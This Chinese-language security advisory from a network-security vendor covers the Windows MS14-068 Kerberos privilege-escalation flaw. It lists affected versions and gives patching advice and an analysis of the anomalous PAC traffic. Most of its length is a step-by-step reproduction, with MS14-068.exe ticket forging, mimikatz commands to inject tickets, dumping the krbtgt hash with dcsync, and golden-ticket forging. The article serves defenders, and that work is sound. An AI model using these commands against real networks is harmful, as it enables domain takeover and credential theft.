文章插图
【四步升至域管权限,Windows域提权漏洞需防护】
MS14-068漏洞可谓是威力无穷,在域渗透中,第一步就是应该检测域控是否有这个漏洞,一旦域控没有打上这个补丁,将会使内网渗透变得十分简单 。对于内网安全问题,聚铭网络也一直进行跟踪守护,切实协助企业组织做好网络安全防护建设工作,规避安全风险 。
一、漏洞描述远程权限提升漏洞存在于Microsoft windows的Kerberos KDC实现中 。存在该漏洞的症状是,Microsoft Kerberos KDC实现无法正确验证签名,这可能造成Kerberos服务票证的某些方面被人伪造 。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限 。
二、受影响版本
Microsoft Windows Windows Server 2012 GoldR2
Microsoft Windows Windows Server 2012 Gold
Microsoft Windows Windows 7 SP1
Microsoft Windows Vista SP2
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 8.1
Microsoft Windows 8
三、漏洞利用前提域控没有打MS14-068补丁,攻击者拿下了一台域内的普通计算机并获得普通域用户以及密码/hash值以及用户suid 。
四、漏洞复现1.搭建环境
域控制器:windows 2008 r2域内主机:windows 7MS14-068.exemimikatz工具
2.漏洞利用
1)查看域控是否有MS14-068这个漏洞,利用命令systeminfo,查看是否打补丁(KB3011780),下图中没有看到打MS14-068相关漏洞的补丁 。
文章插图
2)登陆域内主机利用whoami/all查看自己的用户名以及sid
文章插图
3)利用MS14-068.exe生成一个新的票据:MS14-068.exe -u user@domain -s sid -d域控ip -p密码(出现报错的话一般是密码错误)
文章插图
4)查看dir \域控计算机名称c$
文章插图
5)利用mimikatz先清除票据,再导入刚刚制作新的票据
(1) Kerberos::purge #清除票据
(2) Kerberos::list #列出票据
(3) Kerberos::ptc 票据位置 #导入票据
文章插图
6)复现成功 。再次利用dir \域控计算机名称c$,发现提升到管理员权限,表明复现成功 。
文章插图
7)黄金票据伪造
a.查看用户krbtgt的hash:
lsadump:dcsync /domain:域名 /all /csv
文章插图
查看用户的sid:
lsadump:dcsync /domain:域名 /user:krbtgt
文章插图
b.制造票据
Kerberos::golden /admin:system /domain:域名 /sid :.... /krbtgt:...(hash) /ticket:票据名称
文章插图
c.导入票据
Kerberos::purge
Kerberos::ptt 票据名称
文章插图
d.复现成功
利用dir \域控名称c$,出现目录,表示成功 。
文章插图
五、修复方案1. 升级补丁
与此同时,请及时做好自查和预防工作,以免遭受黑客攻击 。
六、复现过程中的异常流量分析1.正常流量
文章插图
2.异常流量分析
Client在发起认证请求时,通过设置include-PAC为False,则返回TGT中不会包含PAC 。
- AS-REQ身份认证阶段
文章插图
- 票据授予阶段TGS-REQ
文章插图
- 总结:正常和异常流量的区别在于pac的配置上的异常
异常流量在1.AS-REQ阶段终端设置了pac为false
推荐阅读
- 避免多花费 窗帘选购节约计算的四步骤
- 教您四步买到满意的窗帘
- 怎样拆马桶 简单十四步轻松搞定马桶拆卸
- 怎样拆马桶 教你十四步轻松搞定马桶拆卸
- 比亚迪|续航飙升至730公里 2022款比亚迪唐EV售价曝光:或30万起
- 美国|中国奖牌榜超越美国升至第三 再创历史:网友狂点赞
- Intel|Intel 13代酷睿新爆料!缓存将提升至68MB:游戏性能进一步增强
- 美国|食品通胀恐加剧!奥密克戎令生产放缓 美国牛肉价格升至11月来高点
- 华为|华为研发投入获欧盟肯定:排名升至全球第二 超苹果、微软、Intel
- 比亚迪|比亚迪:2022年销售120万台新能源汽车 市场占有率提升至25%
